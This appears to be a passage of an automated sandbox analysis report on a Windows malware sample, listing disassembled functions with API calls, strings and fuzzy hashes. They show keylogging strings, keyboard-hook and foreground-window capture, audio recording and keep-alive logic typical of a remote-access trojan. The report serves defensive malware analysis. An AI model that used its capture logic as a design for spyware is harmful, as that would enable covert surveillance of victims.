                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseOpenQuerySleepValue
                                                    • String ID: @CG$exepath$BG
                                                    • API String ID: 4119054056-3221201242
                                                    • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                    • Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
                                                    • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                    • Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD
                                                    APIs
                                                      • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                                      • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                                      • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                                    • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                    • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$SleepText$ForegroundLength
                                                    • String ID: [ $ ]
                                                    • API String ID: 3309952895-93608704
                                                    • Opcode ID: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                    • Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
                                                    • Opcode Fuzzy Hash: c7b8921fee698eb27046a54e93bbce2ae6a7b96347d281602c612aefecfbc9ba
                                                    • Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
                                                    • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                    • String ID:
                                                    • API String ID: 3604237281-0
                                                    • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                    • Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
                                                    • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                    • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                    • Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
                                                    • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                    • Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                    • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                    • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                    • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                      • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                      • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                    • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                    • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                    • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                    • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleReadSize
                                                    • String ID:
                                                    • API String ID: 3919263394-0
                                                    • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                    • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                    • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                    • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                    APIs
                                                    • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                    • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                    • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                    • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID:
                                                    • API String ID: 4116985748-0
                                                    • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                    • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                    • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                    • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                    APIs
                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseHandleOpenProcess
                                                    • String ID:
                                                    • API String ID: 39102293-0
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: 4[G$4[G
                                                    • API String ID: 2931989736-4028565467
                                                    APIs
                                                      • Part of subcall function 0044DA6C: GetOEMCP.KERNEL32(00000000,?,?,0044DCF5,?), ref: 0044DA97
                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD3A,?,00000000), ref: 0044DF0D
                                                    • GetCPInfo.KERNEL32(00000000,0044DD3A,?,?,?,0044DD3A,?,00000000), ref: 0044DF20
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CodeInfoPageValid
                                                    • String ID: Zb1Y/
                                                    • API String ID: 546120528-3232713500
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountEventTick
                                                    • String ID: >G
                                                    • API String ID: 180926312-1296849874
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1635606685-3232713500
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004417E0
                                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00441860
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1834446548-3232713500
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftof
                                                    • String ID: Zb1Y/$BG3i@
                                                    • API String ID: 1622813385-1304149209
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A885,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A4F2
                                                    • GetLastError.KERNEL32(?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A51B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 442123175-3232713500
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A8A5,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A404
                                                    • GetLastError.KERNEL32(?,0044A8A5,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A42D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 442123175-3232713500
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                    Strings
                                                    • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                    • API String ID: 481472006-1507639952
                                                    APIs
                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                    • API String ID: 481472006-2430845779
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004341AB
                                                    • ___raise_securityfailure.LIBCMT ref: 00434292
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3761405300-3232713500
                                                    APIs
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                    • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                    • String ID: Online Keylogger Stopped
                                                    • API String ID: 1623830855-1496645233
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 004478DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx$Zb1Y/
                                                    • API String ID: 2568140703-3907430070
                                                    APIs
                                                    • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466E0,?,00000000,00401AD8), ref: 00447590
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormat
                                                    • String ID: GetDateFormatEx$Zb1Y/
                                                    • API String ID: 2793631785-38510114
                                                    APIs
                                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$BufferHeaderPrepare
                                                    • String ID: T=G
                                                    • API String ID: 2315374483-379896819
                                                    APIs
                                                    • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466E0,?,00000000,00401AD8), ref: 004476C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FormatTime
                                                    • String ID: GetTimeFormatEx$Zb1Y/
                                                    • API String ID: 3606616251-4054105572
                                                    APIs
                                                    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,004503BF,?,00000055,00000050), ref: 00447721
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DefaultUser
                                                    • String ID: GetUserDefaultLocaleName$Zb1Y/
                                                    • API String ID: 3358694519-3200787008
                                                    • Opcode ID: 3672e5463deaf5ea45bb47fb4b4115e18536fd74a669daa61855c36d412e2cd6
                                                    • Instruction ID: 6f3b3d2d52d18e2f500aa0c1bfc47f81cd3ef75b8d91e12febc6947054f763d3
                                                    • Opcode Fuzzy Hash: 3672e5463deaf5ea45bb47fb4b4115e18536fd74a669daa61855c36d412e2cd6
                                                    • Instruction Fuzzy Hash: 9EF02430A04208B7CB116F51DC06E9EBF64DF04725F00406AFC045A2A2CB799D1297DD
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: T=G$T=G
                                                    • API String ID: 3519838083-3732185208
                                                    • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                    • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                    • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                    • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044AC66,-00000020,00000FA0,00000000,00466608,00466608,00000000), ref: 00447789
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx$Zb1Y/
                                                    • API String ID: 2593887523-900377698
                                                    • Opcode ID: ba2e66625b1e639b92ffbfc2d6060421e95bbac502ea62ad06ade3e8b7a0989c
                                                    • Instruction ID: 3c73f8e9446f665a62cdb4c3a76b3fd0cb1533be68ae1e2d18ca0a0eecb3414f
                                                    • Opcode Fuzzy Hash: ba2e66625b1e639b92ffbfc2d6060421e95bbac502ea62ad06ade3e8b7a0989c
                                                    • Instruction Fuzzy Hash: 3AF0B431A4420DFBCB155F55DC05EAE7F61DF04722F4141AAFC0416261CF399E11D69D
                                                    APIs
                                                    • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                      • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                      • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                      • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                      • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                      • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                    • String ID: [AltL]$[AltR]
                                                    • API String ID: 2738857842-2658077756
                                                    • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                    • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                    • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                    • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc$Zb1Y/
                                                    • API String ID: 2773662609-3761420814
                                                    • Opcode ID: e78667822f5e79ab7c14d9e4ecf03f3a03c6c70fe98cf5666842121660a76376
                                                    • Instruction ID: e3584e6e60b0ce1f897c1a630e1b5e88222358794527568605747e2193ee0655
                                                    • Opcode Fuzzy Hash: e78667822f5e79ab7c14d9e4ecf03f3a03c6c70fe98cf5666842121660a76376
                                                    • Instruction Fuzzy Hash: 1BE05530A8420AA7C315AB50AC03A2EFB54CF04B22F0005BAFC0413342CE388E0281EE
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Free
                                                    • String ID: FlsFree$Zb1Y/
                                                    • API String ID: 3978063606-3460347783
                                                    • Opcode ID: eb267d74104736367ab5431944ac8927a785c50e3789802343b1094df18b8064
                                                    • Instruction ID: b0516f983214bd8ec60f21e98f60005bdb2fae5df38d207d6cd414e924573594
                                                    • Opcode Fuzzy Hash: eb267d74104736367ab5431944ac8927a785c50e3789802343b1094df18b8064
                                                    • Instruction Fuzzy Hash: A7E0E531F05218A7D3206F25AC02E7EBF94DF44B12F1000AAFD0557352CE784E0186DE
                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,004395E7), ref: 00447650
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FileSystem
                                                    • String ID: GetSystemTimePreciseAsFileTime$Zb1Y/
                                                    • API String ID: 2086374402-2029436538
                                                    • Opcode ID: aedcab76af92cc4bc62ea73aa4e5c5ea7e51aa4d01cdec665397a9b648c5c9e1
                                                    • Instruction ID: 6139676006ac48b35b7740e26133f6a1f63f54bd9e261c6233ed86c194cf6258
